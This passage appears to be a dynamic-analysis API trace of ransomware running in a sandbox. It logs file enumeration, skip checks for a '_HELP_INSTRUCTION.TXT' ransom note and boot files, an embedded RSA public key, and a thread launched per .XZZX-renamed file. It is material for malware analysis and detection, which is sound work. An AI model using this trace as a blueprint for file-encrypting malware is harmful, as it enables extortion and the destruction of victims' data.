MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.848] lstrcpyW (in: lpString1=0x17addc, lpString2="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" | out: lpString1="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX") returned="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" [0197.848] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0197.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd74 [0197.849] Sleep (dwMilliseconds=0x96) [0198.001] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.001] lstrcmpW (lpString1="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpString2="..") returned 1 [0198.001] lstrcmpW (lpString1="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpString2=".") returned 1 [0198.001] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0198.001] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="ntldr") returned 0x0 [0198.001] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="NTLDR") returned 0x0 [0198.001] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0198.001] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0198.001] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0198.001] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") [0198.001] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.001] lstrcpyW (in: lpString1=0x17addc, lpString2="3509B27C28C34484E701F4A52D2D28CC.XZZX" | out: lpString1="3509B27C28C34484E701F4A52D2D28CC.XZZX") returned="3509B27C28C34484E701F4A52D2D28CC.XZZX" [0198.001] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd78 [0198.002] Sleep (dwMilliseconds=0x96) [0198.156] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.156] lstrcmpW (lpString1="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpString2="..") returned 1 [0198.157] lstrcmpW (lpString1="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpString2=".") returned 1 [0198.157] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0198.157] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="ntldr") returned 0x0 [0198.157] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="NTLDR") returned 0x0 [0198.157] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0198.157] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="ntdetect.com") returned 0x0 [0198.157] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0198.157] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") [0198.157] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.157] lstrcpyW (in: lpString1=0x17addc, lpString2="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" | out: lpString1="36D405DA123E25CCEFB9A7DD165F0A14.XZZX") returned="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" [0198.157] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd7c [0198.158] WaitForSingleObject (hHandle=0xd7c, dwMilliseconds=0xffffffff) returned 0x0 [0198.159] Sleep (dwMilliseconds=0x96) [0198.312] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.312] lstrcmpW (lpString1="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpString2="..") returned 1 [0198.313] lstrcmpW (lpString1="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpString2=".") returned 1 [0198.313] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0198.313] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="ntldr") returned 0x0 [0198.313] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="NTLDR") returned 0x0 [0198.313] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0198.313] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0198.313] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0198.313] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") [0198.313] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.313] lstrcpyW (in: lpString1=0x17addc, lpString2="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" | out: lpString1="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX") returned="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" [0198.313] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd80 [0198.314] Sleep (dwMilliseconds=0x96) [0198.469] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.469] lstrcmpW (lpString1="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpString2="..") returned 1 [0198.469] lstrcmpW (lpString1="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpString2=".") returned 1 [0198.469] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0198.469] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="ntldr") returned 0x0 [0198.469] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="NTLDR") returned 0x0 [0198.469] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0198.469] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0198.469] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0198.469] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") [0198.469] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.470] lstrcpyW (in: lpString1=0x17addc, lpString2="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" | out: lpString1="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX") returned="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" [0198.470] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd84 [0198.470] Sleep (dwMilliseconds=0x96) [0198.624] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.624] lstrcmpW (lpString1="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpString2="..") returned 1 [0198.625] lstrcmpW (lpString1="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpString2=".") returned 1 [0198.625] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0198.625] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="ntldr") returned 0x0 [0198.625] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="NTLDR") returned 0x0 [0198.625] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0198.625] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0198.625] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0198.625] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") [0198.625] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.625] lstrcpyW (in: lpString1=0x17addc, lpString2="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" | out: lpString1="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX") returned="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" [0198.625] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd88 [0198.626] Sleep (dwMilliseconds=0x96) [0198.780] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.780] lstrcmpW (lpString1="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpString2="..") returned 1 [0198.781] lstrcmpW (lpString1="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpString2=".") returned 1 [0198.781] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0198.781] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="ntldr") returned 0x0 [0198.781] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="NTLDR") returned 0x0 [0198.781] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0198.781] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0198.781] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0198.781] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") [0198.781] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.781] lstrcpyW (in: lpString1=0x17addc, lpString2="D1B4BDC437A182A42497439F3BC266EC.XZZX" | out: lpString1="D1B4BDC437A182A42497439F3BC266EC.XZZX") returned="D1B4BDC437A182A42497439F3BC266EC.XZZX" [0198.781] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.781] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd8c [0198.782] Sleep (dwMilliseconds=0x96) [0198.936] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.936] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0198.936] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0198.937] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0198.937] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0198.937] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0198.937] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0198.937] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" [0198.937] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*" [0198.937] SetErrorMode (uMode=0x1) returned 0x1 [0198.937] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\_HELP_INSTRUCTION.TXT") returned 97 [0198.937] GetUserNameW (in: lpBuffer=0x178178, 